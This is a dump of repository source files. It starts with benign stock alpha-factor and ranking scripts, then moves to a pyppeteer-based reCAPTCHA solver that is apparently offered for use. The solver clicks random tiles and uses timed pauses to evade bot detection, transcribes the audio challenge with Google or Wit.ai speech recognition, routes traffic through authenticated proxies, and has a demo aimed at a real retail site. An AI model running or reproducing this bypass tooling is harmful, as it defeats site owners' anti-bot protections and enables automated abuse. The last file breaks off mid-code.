panel_data.major_xs(symbol).CLOSE[date_counter] \n yesterday_close = panel_data.major_xs(symbol).CLOSE[date_counter-1]\n \n if not (math.isnan(today_close) or math.isnan(yesterday_close) or math.isnan(today_open)):\n priorperiod_pnl = (today_close - yesterday_close) * lot\n return priorperiod_pnl\n\ndef getReturn():\n pnls = []\n list_symbol = []\n list_lot = []\n buy_sell_lot = [[]] * int(holding_period-1)\n buy_sell_list = [[]] * int(holding_period)\n date_counter = 0\n panel_data = readData(\"./data/zz500/\")\n path_rank = \"./alpha191/date/rank_ew/\"\n for file in os.listdir(path_rank):\n # read symbol.csv file and calculate mtmDailyPnl append to pnl\n print(buy_sell_list)\n print(buy_sell_lot)\n priorperiod_pnl = 0.0\n list_lot = []\n for i in range(holding_period-1):\n if (i==0):\n for symbol in buy_sell_list[0]:\n pnl, lot = priorperiodMTMDailyPnl_1(symbol, date_counter, panel_data)\n list_lot.append(lot)\n priorperiod_pnl += pnl\n buy_sell_lot = [list_lot] + buy_sell_lot\n else:\n for symbol in buy_sell_list[i]:\n index = buy_sell_list[i].index(symbol)\n pnl = priorperiodMTMDailyPnl_2(symbol, date_counter, buy_sell_lot[i][index], panel_data)\n priorperiod_pnl += pnl\n \n transaction_pnl = 0.0\n for symbol in buy_sell_list[holding_period-1]:\n index = buy_sell_list[holding_period-1].index(symbol)\n if buy_sell_lot[holding_period-1]:\n pnl = transactionMTMDailyPnl(symbol, date_counter, buy_sell_lot[holding_period-1][index], panel_data)\n else:\n pnl = 0.0\n transaction_pnl += pnl\n data = pd.read_csv(path_rank + file, index_col=0)\n list_symbol = data.tail(10).index.tolist()\n # calculate sw \n index = list_symbol.index(\"Row_sum\")\n del list_symbol[index:]\n list_symbol = [x[:6] for x in list_symbol]\n list_symbol = list_symbol[-1*stock_num:] # tomorrow to buy\n buy_sell_list = [list_symbol] + buy_sell_list\n \n pnls.append(transaction_pnl + priorperiod_pnl)\n date_counter += 1\n return pnls\n \npnls = getReturn()\npnls = [round(x, 2) for x in pnls]\ncum_pnls = np.cumsum(pnls)\n#data = pd.read_csv(\"./data/000905.csv\", index_col=0)\nplt.plot(cum_pnls)\n#plt.plot(data.CLOSE)\nplt.show()\n"
},
{
"alpha_fraction": 0.5861513614654541,
"alphanum_fraction": 0.6380032300949097,
"avg_line_length": 25.31355857849121,
"blob_id": "b13735004e700f0e17bdcd99c87342c5ca6b4377",
"content_id": "f9adc28493c17e19e2401900e5bde7c2923284d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3105,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 118,
"path": "/factor.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nalpha 191 factors\n\"\"\"\n\nfrom math import log\nimport scipy.stats as stats\nfrom datetime import datetime\n\n\"\"\"\nlatest updated data insert to front\n\"\"\"\nVOLUME = [1,2,5,7,5,4,8]\nCLOSE = [5,6,8,4,5,6,7]\nOPEN = [4,8,4,5,4,4,5]\nHIGH = [6,9,9,6,6,7,8]\nLOW = [4,5,4,4,4,3,4]\nVWAP = [4,5,4,4,4,3,4]\n\ndef getListOpen(OPEN, n):\n return OPEN[:n]\n\ndef getOpen(OPEN,n):\n return OPEN[n]\n\ndef getListHigh(HIGH, n):\n return HIGH[:n]\n\ndef getHigh(HIGH,n):\n return HIGH[n]\n\ndef getListLow(LOW, n):\n return LOW[:n]\n\ndef getLow(LOW,n):\n return LOW[n]\n\ndef getVwap(VWAP, n):\n return VWAP[n]\n\ndef getListClose(CLOSE, n):\n return CLOSE[:n]\n\ndef getClose(CLOSE,n):\n return CLOSE[n]\n \ndef getListVolume(VOLUME, n):\n return VOLUME[:n]\n\ndef getVolume(VOLUME, n):\n return VOLUME[n]\n\ndef getDelay(A, n):\n return A[n]\n\ndef getListAdd(A, B):\n \"\"\"\n list A + list B\n \"\"\"\n return list(map(lambda x: x[0]+x[1], zip(A, B)))\n\ndef getSum(A, n):\n \"\"\"\n sum of last n days\n \"\"\"\n if A.empty():\n return 0\n else:\n return sum(A[:n])\n\ndef getListSub(A, B):\n return list(map(lambda x: x[0]-x[1], zip(A, B)))\n \ndef getListDiv(A, B):\n return list(map(lambda x: x[0]/x[1], zip(A, B)))\n\ndef getListLog(A):\n\treturn [log(x, 10) for x in A]\n\ndef getListRank(A):\n A.sort()\n return A\n \ndef getListDelta(A, n):\n # TODO\n if len(A) == 2:\n return A[1]-A[0]\n else:\n return [A[m]-A[m-n] for m in range(1,len(A))]\n\ndef getListCorr(A, B, n):\n value = stats.pearsonr(A,B)\n return value[0]\n\ndef updateFactors(data):\n return data\n\nalpha_1 = (-1 * getListCorr(getListRank(getListDelta(getListLog(getListVolume(VOLUME,7)), 1)), getListRank(getListDiv(getListSub(getListClose(CLOSE,6), getListOpen(OPEN,6)), getListOpen(OPEN,6))), 6))\nalpha_2 = (-1 * getListDelta(getListDiv(getListSub(getListSub(getListClose(CLOSE, 2), getListLow(LOW,2)), getListSub(getListHigh(HIGH,2), getListClose(CLOSE,2))), getListSub(getListHigh(HIGH,2), getListLow(LOW,2))), 1))\n\nalpha_3=0\nfor i in range(6):\n alpha_3 += (0 if getClose(CLOSE,i)==getDelay(CLOSE,i+1) else getClose(CLOSE,i)-(min(getLow(LOW,i),getDelay(CLOSE,i+1)) if getClose(CLOSE,i)>getDelay(CLOSE,i+1) else max(getHigh(HIGH,i),getDelay(CLOSE,i+1))))\nalpha_13 = (((getHigh(HIGH,0) * getLow(LOW,0))**0.5) - getVwap(VWAP,0))\nalpha_14 = getClose(CLOSE,0)-getDelay(CLOSE,5)\nalpha_15 = getOpen(OPEN,0)/getDelay(CLOSE,1)-1\n#alpha_17 = getListRank((VWAP - MAX(VWAP, 15)))^DELTA(CLOSE, 5) #TODO\nalpha_18 = getClose(CLOSE,0)/getDelay(CLOSE,5) \nalpha_19 = ((getClose(CLOSE,0)-getDelay(CLOSE,5))/getDelay(CLOSE,5) if getClose(CLOSE,0)<getDelay(CLOSE,5) else ((0 if getClose(CLOSE,0)==getDelay(CLOSE,5) else (getClose(CLOSE,0)-getDelay(CLOSE,5))/getClose(CLOSE,0))))\nalpha_20 = (getClose(CLOSE,0)-getDelay(CLOSE,6))/getDelay(CLOSE,6)*100\nprint (\"alpha_1: \", alpha_1)\nprint (\"alpha_2: \", alpha_2)\nprint (\"alpha_3: \", alpha_3)\nprint (\"alpha_13: \", alpha_13)\nprint (\"alpha_14: \", alpha_14)\nprint (\"alpha_15: \", alpha_15)\nprint (\"alpha_18: \", alpha_18)\nprint (\"alpha_19: \", alpha_19)\nprint (\"alpha_20: \", alpha_20)\n"
},
{
"alpha_fraction": 0.6459909081459045,
"alphanum_fraction": 0.6737266778945923,
"avg_line_length": 26.943662643432617,
"blob_id": "147d13ff36c06458d947cc51c16590d6a1264198",
"content_id": "bd2a4ec616f24cb8eb65d37ac451371d87a2b0ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1983,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 71,
"path": "/gData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nget data\n\"\"\"\nimport os\nimport re\nimport csv\nimport time\nimport pandas as pd\n# import tushare as ts\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\ndef naturalKeys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split('(\\d+)', text) ]\n\ndef getData():\n\tdata = pd.read_csv('./data/zz500.csv', encoding='cp1252')\n\tsymbol_list = data['code'].tolist()\n\tsymbol_list.sort()\n\t#symbol_list.sort(key=naturalKeys)\n\t\n\tpanel_data = {}\n\tfor symbol in symbol_list:\n\t\thistory_data = ts.get_h_data(str(symbol).zfill(6), \"2009-01-01\", \"2018-06-30\")\n\t\thistory_data.to_csv('./data/symbol/'+str(symbol).zfill(6)+'.csv')\n\t\ttime.sleep(120)\n\t\t#history_data = pd.read_csv('./data/symbol/'+str(symbol).zfill(6)+'.csv', encoding='cp1252')\n\t\t#history_data.set_index('date', inplace=True)\n\t\t#panel_data[str(symbol).zfill(6)] = history_data\t\n\n\tpanel_data = pd.Panel(panel_data).transpose('minor', 'major', 'items')\n\t#print (panel_data.major_axis)\n\t#print (panel_data.minor_axis)\n\t#print (panel_data.items)\n\treturn panel_data\n\ndef getDataUpdate(date):\n\tdata = []\n\tpath = \"./alpha191/date/origin/\"\n\tfile = \"alpha191_\" + date + '.csv'\n\tdata = pd.read_csv(path + file, index_col=0)\n\treturn data\n\ndef getAlphaData():\n\tpanel_data = {}\n\tpath = \"./alpha191/date/origin/\"\n\tfor file in os.listdir(path):\n\t\tdata = pd.read_csv(path + file, index_col=0)\n\t\tpanel_data[file[9:-4]] = data\n\tpanel_data = pd.Panel(panel_data).transpose('minor', 'items', 'major')\n\t#print (panel_data.items)\n\t#print (panel_data.major_axis)\n\t#print (panel_data.minor_axis)\n\treturn panel_data\n\n#getAlphaData()\n\"\"\"\npanel_data = getData()\ndate_list = panel_data.major_axis.astype(str)\ncounter=0\nfor date in panel_data.major_axis:\n\tprint (panel_data.major_xs(date))\n\t#panel_data.major_xs(date).to_csv('./data/date/'+date_list[counter]+'.csv')\n\tcounter += 1\n\"\"\""
},
{
"alpha_fraction": 0.5797649621963501,
"alphanum_fraction": 0.5974905490875244,
"avg_line_length": 26.899999618530273,
"blob_id": "1cf24f1e3c6542fd966c827f52421d5f555f8516",
"content_id": "cc4b70ebcfca857f4618001ff5194f93c0f7f9db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5021,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 180,
"path": "/pData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nprocess data\n\"\"\"\n\nimport csv\nimport math\nfrom gData import *\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\ndef readData():\n \"\"\"\n read all data from file \n \"\"\"\n panel_data = getAlphaData()\n #panel_data = panel_data.transpose('minor', 'major', 'items')\n return panel_data\n #return pd.read_csv(\"data.csv\")\n \ndef readDataUpdate(date):\n \"\"\"\n read today data from file\n \"\"\"\n data = getDataUpdate(date)\n return data\n \ndef cleanData(data):\n \"\"\"\n data wrapper\n \"\"\"\n # delete too much missing data rows\n #data = data.dropna(1)\n #data.dropna(thresh=4, inplace=True)\n #data = data.dropna(subset=['factor_1']) \n \n # fillna\n #data['factor_1'] = data.groupby('industry').transform(lambda x: x.fillna(x.mean()))\n #data['factor_1'] = data.groupby('industry').transform(lambda x: x.fillna(x.median()))\n #data['factor_2'] = data.groupby('industry').transform(lambda x: x.fillna(x.mean()))\n #data['factor_2'] = data.groupby('industry').transform(lambda x: x.fillna(x.median()))\n return data\n\ndef updateData(data):\n \n return data\n \ndef normalizeByIndustry(data):\n \"\"\"\n data normalization by industry\n \"\"\"\n data[\"factor\"] = (data.groupby('industry')['factor'].transform(lambda x: x/x.sum()))\n return data\n\ndef normalizationStandard(data):\n \"\"\"\n data normalization\n \"\"\"\n # standard\n data = data.apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x)))\n return data\n\ndef normalizationZscore(data):\n \"\"\"\n data normalization\n \"\"\"\n # Z-score\n data = data.apply(lambda x: (x - np.average(x)) / np.std(x))\n return data\n\ndef equalWeight(panel_data):\n \"\"\"\n calculate all trading days equal weight\n \"\"\"\n path = './alpha191/date/normal_ew/'\n for date in panel_data.major_axis:\n data = panel_data.major_xs(date)\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n data.to_csv(path+date+'.csv')\n \ndef equalWeightUpdate(date, data):\n \"\"\"\n calculate one trading day equal weight\n \"\"\"\n path = './alpha191/date/normal_ew/'\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n file = date+'.csv'\n data.to_csv(path + file)\n \ndef selfWeight(panel_data):\n path = './alpha191/date/normal_sw/'\n for date in panel_data.major_axis:\n data = panel_data.major_xs(date)\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n \n data.loc['Row_sum'] = data.loc['Row_sum']/data.iat[-1,-1]\n sum = 0.0\n for i in range(len(data.Col_sum)-1):\n for j in range(191):\n if not (math.isnan(data.iat[i,j]) or math.isnan(data.iat[-1,j])):\n sum += data.iat[i,j] * data.iat[-1,j]\n data.Col_sum[i] = sum * 100.0\n sum = 0.0\n data.to_csv(path+date+'.csv')\n \ndef selfWeightUpdate(date, data):\n \"\"\"\n calculate one trading day equal weight\n \"\"\"\n path = './alpha191/date/normal_sw/'\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n \n data.loc['Row_sum'] = data.loc['Row_sum']/data.iat[-1,-1]\n sum = 0.0\n for i in range(len(data.Col_sum)-1):\n for j in range(191):\n if not (math.isnan(data.iat[i,j]) or math.isnan(data.iat[-1,j])):\n sum += data.iat[i,j] * data.iat[-1,j]\n data.Col_sum[i] = sum * 100.0\n sum = 0.0\n file = date+'.csv'\n data.to_csv(path + file)\n\ndef rank(path_nor, path_rank):\n \"\"\"\n data rank\n \"\"\"\n for file in os.listdir(path_nor):\n data = pd.read_csv(path_nor + file, index_col=0)\n data.sort_values(\"Col_sum\",inplace=True)\n data.to_csv(path_rank + file)\n \ndef rankUpdate(date, path_nor, path_rank):\n \"\"\"\n data rank\n \"\"\"\n file = date + \".csv\"\n data = pd.read_csv(path_nor + file, index_col=0)\n data.sort_values(\"Col_sum\",inplace=True)\n data.to_csv(path_rank + file)\n\n\"\"\"\n# get origin from jointquant\npanel_data = readData()\n\nequalWeight(panel_data)\npath_nor = \"./alpha191/date/normal_ew/\"\npath_rank = \"./alpha191/date/rank_ew/\"\nrank(path_nor, path_rank)\n\nselfWeight(panel_data)\npath_nor = \"./alpha191/date/normal_sw/\"\npath_rank = \"./alpha191/date/rank_sw/\"\nrank(path_nor, path_rank)\n\"\"\"\n\n\n# update date data\ndate = \"2018-07-17\"\ndata = readDataUpdate(date)\n\nequalWeightUpdate(date, data)\npath_nor = \"./alpha191/date/normal_ew/\"\npath_rank = \"./alpha191/date/rank_ew/\"\nrankUpdate(date, path_nor, path_rank)\n\n\"\"\"\nselfWeightUpdate(date, data)\npath_nor = \"./alpha191/date/normal_sw/\"\npath_rank = \"./alpha191/date/rank_sw/\"\nrankUpdate(date, path_nor, path_rank)\n\"\"\""
},
{
"alpha_fraction": 0.3918918967247009,
"alphanum_fraction": 0.7432432174682617,
"avg_line_length": 24,
"blob_id": "41834c07008fc9dc98b5a59e66a819550aedc964",
"content_id": "a3ec189033adf0b4e691a10192a08a6983f658ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 3,
"path": "/dzh/README.txt",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "capital = 400,000,000\nrolling capital = 200,000,000\nper stock = 10,000,000"
},
{
"alpha_fraction": 0.6770691871643066,
"alphanum_fraction": 0.6933514475822449,
"avg_line_length": 22.80645179748535,
"blob_id": "13f0045462deaef2540b5f82eb0cb962e86bc2de",
"content_id": "1a44f5244a47b192932b0251a044b48fc26fec67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 737,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 31,
"path": "/rData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nread csv file to panel data\n\"\"\"\nimport os\nimport csv\nimport pandas as pd\n\npath = \"./data/zz500/\"\ndef readData(path):\n\tpanel_data = {}\n\tfor file in os.listdir(path):\n\t\tdata = pd.read_csv(path + file, index_col=0)\n\t\tpanel_data[file[:-4]] = data\n\tpanel_data = pd.Panel(panel_data).transpose('minor', 'items', 'major')\n\t#print (panel_data.items)\n\t#print (panel_data.major_axis)\n\t#print (panel_data.minor_axis)\n\t#data = panel_data.major_xs(\"000006\")\n\t#print (data.CLOSE[0])\n\treturn panel_data\n\n#readData(path)\n\"\"\"\nfor symbol in panel_data.major_axis:\n\tprint (symbol)\nprint (panel_data.major_axis)\nprint (panel_data.minor_axis)\nprint (panel_data.items)\n#panel_data = cleanData(panel_data)\n#date_list = panel_data.major_axis.astype(str)\n\"\"\""
},
{
"alpha_fraction": 0.4682634770870209,
"alphanum_fraction": 0.4958083927631378,
"avg_line_length": 26.866666793823242,
"blob_id": "ded342b89432ff6636b07a43c51d42553a49b802",
"content_id": "5c78dbd4319116852ee18712ebac8d01d2bb9ea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 835,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 30,
"path": "/dzh.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "import csv\nimport openpyxl\nfrom datetime import datetime\n\nwb = openpyxl.load_workbook(\"zz500_1.xlsx\")\nsheets = wb.get_sheet_names()\n\nfor sheet in sheets:\n print (sheet)\n \"\"\"\n ws = wb.get_sheet_by_name(sheet)\n name = ws['A1'].value\n print (name)\n ws['A2'].value = \"DATE\"\n ws['A3'].value = datetime(2018, 1, 2)\n \n path = \"./zz500/\"\n with open(path+name[:-3]+'.csv', 'w', newline=\"\") as f: \n counter_row = 0\n c = csv.writer(f)\n for r in ws.rows:\n if counter_row != 0:\n cell_list = [cell.value for cell in r]\n if counter_row == 1: \n c.writerow(cell_list)\n else:\n cell_list[0] = cell_list[0].strftime(\"%Y-%m-%d\")\n c.writerow(cell_list)\n counter_row += 1\n \"\"\""
}
] | 7 |
e2pluginss/Pypuppeteer_Captcha_Solver
|
https://github.com/e2pluginss/Pypuppeteer_Captcha_Solver
|
0650730fc5547dab4d516ea988bdedc15202f6dd
|
af94b94c309de3c0d7dfa8a4657a7e05a79bd496
|
f78539e43eefef0be0ceef0bd2edab9b4bf5f174
|
refs/heads/master
| 2023-04-07T22:53:00.189023 | 2021-04-21T08:23:13 | 2021-04-21T08:23:13 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6364889740943909,
"alphanum_fraction": 0.6479779481887817,
"avg_line_length": 35.88135528564453,
"blob_id": "f73c324853745c48e9f421abd27bed38c386a3ca",
"content_id": "da44d4e220bbbf7491795dfa95a34ef8634a08d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2176,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 59,
"path": "/captcha_solver/speech.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Speech module. Text-to-speech classes - Sphinx, Google, WitAI, Amazon, and Azure. \"\"\"\nimport logging\nimport speech_recognition as sr\nfrom pydub import AudioSegment\nfrom captcha_solver.base import settings\n\n\nasync def mp3_to_wav(mp3_filename):\n \"\"\"Convert mp3 to wav\"\"\"\n wav_filename = mp3_filename.replace(\".mp3\", \".wav\")\n segment = AudioSegment.from_mp3(mp3_filename)\n sound = segment.set_channels(1).set_frame_rate(16000)\n garbage = len(sound) / 3.1\n sound = sound[+garbage:len(sound) - garbage]\n sound.export(wav_filename, format=\"wav\")\n return wav_filename\n\nclass Google(object):\n async def get_text(self, mp3_filename):\n wav_filename = await mp3_to_wav(mp3_filename)\n \n recognizer = sr.Recognizer()\n with sr.AudioFile(wav_filename) as source:\n audio = recognizer.record(source) \n # recognize speech using Google Speech Recognition\n audio_output = None\n try:\n audio_output = recognizer.recognize_google(audio)\n print(\"Google Speech Recognition: \" + audio_output)\n except sr.UnknownValueError:\n logging.warning(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n logging.warning(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n return audio_output\n\n \nclass WitAI(object):\n API_KEY = settings[\"speech\"][\"wit.ai\"][\"secret_key\"]\n\n async def get_text(self, mp3_filename):\n wav_filename = await mp3_to_wav(mp3_filename)\n \n recognizer = sr.Recognizer()\n with sr.AudioFile(wav_filename) as source:\n audio = recognizer.record(source) \n\n audio_output = None\n try:\n audio_output = recognizer.recognize_wit(audio, key=self.API_KEY)\n print(\"Wit.AI Recognition: \" + audio_output)\n except sr.UnknownValueError: \n logging.warning(\"Wit.ai could not understand audio\")\n except sr.RequestError as e:\n logging.warning(\"Could not request results from Wit.ia; {0}\".format(e))\n\n return audio_output\n"
},
{
"alpha_fraction": 0.6852226853370667,
"alphanum_fraction": 0.6872469782829285,
"avg_line_length": 21.976743698120117,
"blob_id": "e01b975d36460a287a2f6acf97de31f36708b94d",
"content_id": "955434cb20b7973fa0185a203fdf41b8511b681e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 988,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 43,
"path": "/captcha_solver/exceptions.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Exceptions used in library. \"\"\"\n\n\nclass captcha_solverError(Exception):\n \"\"\" captcha_solver base exception. \"\"\"\n\n\nclass SafePassage(captcha_solverError):\n \"\"\" Raised when all checks have passed. Such as being detected or try again. \"\"\"\n pass\n\n\nclass ResolveMoreLater(captcha_solverError):\n \"\"\" Raised when audio deciphering is incorrect and we can try again. \"\"\"\n pass\n\n\nclass TryAgain(captcha_solverError):\n \"\"\" Raised when audio deciphering is incorrect and we can try again. \"\"\"\n pass\n\n\nclass ReloadError(captcha_solverError):\n \"\"\" Raised when audio file doesn't reload to a new one. \"\"\"\n pass\n\n\nclass DownloadError(captcha_solverError):\n \"\"\" Raised when downloading the audio file errors. \"\"\"\n pass\n\n\nclass ButtonError(captcha_solverError):\n \"\"\" Raised when a button doesn't appear. \"\"\"\n pass\n\n\nclass IframeError(captcha_solverError):\n \"\"\" Raised when defacing page times out. \"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6750448942184448,
"alphanum_fraction": 0.6876122355461121,
"avg_line_length": 29.94444465637207,
"blob_id": "97b9c847ac607f513665d9a2bb1c70022c78348c",
"content_id": "f51c1d4e49f046cd9936aa2ee11fbe33c388fbe4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 18,
"path": "/demo.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "from captcha_solver.solver import Solver\n\npageurl = \"https://www.rackroomshoes.com/\"\n\nproxy = \"http://127.0.0.1\"\nauth_details = {\"username\": \"proxy_username\", \"password\": \"proxy_password\"}\nargs = [\"--timeout 5\"]\noptions = {\"ignoreHTTPSErrors\": True, \"args\": args} \nclient = Solver(\n # With Proxy\n # pageurl, lang='en-US', options=options, proxy=proxy, proxy_auth=auth_details\n # Without Proxy\n pageurl, lang='en-US', options=options, retain_source=False\n)\n\nsolution = client.loop.run_until_complete(client.start())\nif solution:\n print(solution)\n"
},
{
"alpha_fraction": 0.605614960193634,
"alphanum_fraction": 0.6194295883178711,
"avg_line_length": 29.33783721923828,
"blob_id": "0b798cb27ae6e8ad5d9af2c08ad5d3d62ac94654",
"content_id": "a701d04d21e80f0f61aeaa34ed35f248d8c52ab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2244,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 74,
"path": "/captcha_solver/util.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Utility functions. \"\"\"\nimport asyncio\nimport aiofiles\nimport requests\nfrom pyppeteer.chromium_downloader import *\nfrom requests.auth import HTTPProxyAuth\n\n\n__all__ = [\n 'get_event_loop',\n \"save_file\",\n \"load_file\",\n \"get_page\",\n]\n\nNO_PROGRESS_BAR = os.environ.get('PYPPETEER_NO_PROGRESS_BAR', '')\nif NO_PROGRESS_BAR.lower() in ('1', 'true'):\n NO_PROGRESS_BAR = True # type: ignore\n\nwin_postf = \"win\" if int(REVISION) > 591479 else \"win32\"\ndownloadURLs.update({\n 'win32': f'{BASE_URL}/Win/{REVISION}/chrome-{win_postf}.zip',\n 'win64': f'{BASE_URL}/Win_x64/{REVISION}/chrome-{win_postf}.zip',\n})\nchromiumExecutable.update({\n 'win32': DOWNLOADS_FOLDER / REVISION / f'chrome-{win_postf}' / 'chrome.exe',\n 'win64': DOWNLOADS_FOLDER / REVISION / f'chrome-{win_postf}' / 'chrome.exe',\n})\n\n\ndef get_event_loop():\n \"\"\"Get loop of asyncio\"\"\"\n if sys.platform == \"win32\":\n return asyncio.ProactorEventLoop()\n return asyncio.new_event_loop()\n\n\nasync def save_file(file, data, binary=False):\n \"\"\"Save data on file\"\"\"\n mode = \"w\" if not binary else \"wb\"\n async with aiofiles.open(file, mode=mode) as f:\n await f.write(data)\n\n\nasync def load_file(file, binary=False):\n \"\"\"Load data on file\"\"\"\n mode = \"r\" if not binary else \"rb\"\n async with aiofiles.open(file, mode=mode) as f:\n return await f.read()\n\n\nasync def get_page(url, proxy=None, proxy_auth=None, binary=False, verify=False, timeout=300):\n \"\"\"Get data of the page (File binary of Response text)\"\"\"\n urllib3.disable_warnings()\n proxies = None\n auth = None\n if proxy and proxy_auth:\n proxies = {\"http\": proxy, \"https\": proxy}\n auth = HTTPProxyAuth(proxy_auth['username'], proxy_auth['password'])\n retry = 3 # Retry 3 times\n while retry > 0:\n try:\n with requests.Session() as session:\n session.proxy = proxies\n session.auth = auth\n response = session.get(url, verify=verify, timeout=timeout)\n if binary:\n return response.content\n return response.text\n except requests.exceptions.ConnectionError:\n retry -= 1"
},
{
"alpha_fraction": 0.5727755427360535,
"alphanum_fraction": 0.5775564312934875,
"avg_line_length": 39.697296142578125,
"blob_id": "12daa3b2bfe7764bc81cc39946f9379f5756a00d",
"content_id": "f779a7c5e3f89effd704c7dcd633eaf24448b047",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7530,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 185,
"path": "/captcha_solver/audio.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Audio solving module. \"\"\"\nimport asyncio\nimport os\nimport random\nimport shutil\nimport tempfile\nfrom asyncio import TimeoutError, CancelledError\n\nfrom aiohttp.client_exceptions import ClientError\n\nfrom captcha_solver import util\nfrom captcha_solver.base import Base\nfrom captcha_solver.exceptions import DownloadError, ReloadError, TryAgain, ButtonError, SafePassage, ResolveMoreLater\nfrom captcha_solver.speech import Google, WitAI\n\n\nclass SolveAudio(Base):\n def __init__(self, page, image_frame, loop=None, proxy=None, proxy_auth=None, lang='en-US', options=None,\n chromePath=None, **kwargs):\n self.page = page\n self.image_frame = image_frame\n self.service = self.speech_service.lower()\n\n super(SolveAudio, self).__init__(loop=loop, proxy=proxy, proxy_auth=proxy_auth, language=lang, options=options,\n chromePath=chromePath, **kwargs)\n\n async def solve_by_audio(self):\n \"\"\"Go through procedures to solve audio\"\"\"\n self.log('Wait for Audio Buttom ...')\n await self.loop.create_task(self.wait_for_audio_button())\n self.log('Click random images ...')\n for _ in range(int(random.uniform(2, 5))):\n await asyncio.sleep(random.uniform(0.2, 0.5)) # Wait 2-5 ms\n await self.click_tile() # Click random images\n await asyncio.sleep(random.uniform(1.5, 3.5)) # Wait 1-3 seg\n await self.click_verify() # Click Verify button\n self.log('Clicking Audio Buttom ...')\n await asyncio.sleep(random.uniform(1, 3)) # Wait 1-3 sec\n result = await self.click_audio_button() # Click audio button\n if isinstance(result, dict):\n if result[\"status\"] == \"detected\": # Verify if detected\n return result\n # Start process\n await self.get_frames()\n answer = None\n # Start url for ...\n start_url = self.page.url\n for _ in range(8):\n try:\n answer = await self.loop.create_task(self.get_audio_response())\n temp = self.service\n self.service = self.speech_secondary_service.lower() # Secondary Recognition\n self.speech_secondary_service = temp\n except TryAgain:\n self.log('Try again Error!')\n except DownloadError:\n self.log('Download Error!')\n except ReloadError:\n self.log('Reload Error!')\n else:\n if not answer:\n continue\n else:\n if len(answer) < 4:\n continue\n await self.type_audio_response(answer)\n await self.click_verify()\n await asyncio.sleep(2.0) # Wait 2seg\n if start_url != self.page.url:\n return {'status': 'success'}\n try:\n result = await self.check_detection(self.animation_timeout)\n except TryAgain:\n continue\n except SafePassage:\n continue\n except Exception:\n raise ResolveMoreLater('You must solve more captchas.')\n else:\n return result\n else:\n return {\"status\": \"retries_exceeded\"}\n\n async def wait_for_audio_button(self):\n \"\"\"Wait for audio button to appear.\"\"\"\n try:\n await self.image_frame.waitForFunction(\n \"jQuery('#recaptcha-audio-button').length\",\n timeout=self.animation_timeout)\n except ButtonError:\n raise ButtonError(\"Audio button missing, aborting\")\n except Exception as ex:\n self.log(ex)\n raise Exception(ex)\n\n async def click_tile(self):\n \"\"\"Click random title for bypass 